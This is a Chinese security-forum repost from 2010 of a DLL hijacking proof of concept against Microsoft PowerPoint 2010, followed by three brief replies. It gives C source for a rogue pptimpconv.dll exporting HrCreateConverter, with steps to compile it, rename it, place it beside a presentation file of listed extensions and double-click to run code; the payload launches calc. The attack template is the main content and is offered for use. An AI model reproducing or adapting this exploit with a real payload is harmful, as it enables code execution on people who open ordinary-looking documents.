首页
社区
课程
招聘
[转帖]Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)
发表于: 2010-8-25 11:07 6078

[转帖]Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)

2010-8-25 11:07
6078
/*
Exploit Title: Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)
Date: 24/08/2010
Software Link: fddK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3!0X3k6X3W2U0k6g2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8g2)9J5c8X3g2F1i4K6u0V1N6i4y4Q4x3V1k6H3L8%4N6W2M7Y4m8G2K9h3&6@1i4K6u0r3
Version: 14.0.4760.1000
Tested on: Windows 7 x86 (6.1.7600)

Compile and rename to pptimpconv.dll, create a file in the same dir with one of the following extensions:
.odp / .pot / .potm / .potx / .ppa / .pps / .ppsm / .ppsx / .ppt / .pptm / .pptx / .pwz / .sldm / .sldx

This exploit does _not_ get triggered with the following file extensions:
.pothtml / .ppam / .ppthtml / .pptxml / .thmx

Double click & watch a nice calculator pop =]
*More shouts* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void HrCreateConverter() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

[培训]科锐软件逆向54期预科班、正式班开始火爆招生报名啦!!!

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 205
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
dll劫持的,看了下没什么新意啊.exploit-db上也有
2010-8-25 17:44
0
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
看ID就知道了。。我是水王
2010-8-26 00:46
0
雪    币: 181
活跃值: (37)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
没新意?现在很牛逼的说
2010-8-26 17:02
0
游客
登录 | 注册 方可回帖
返回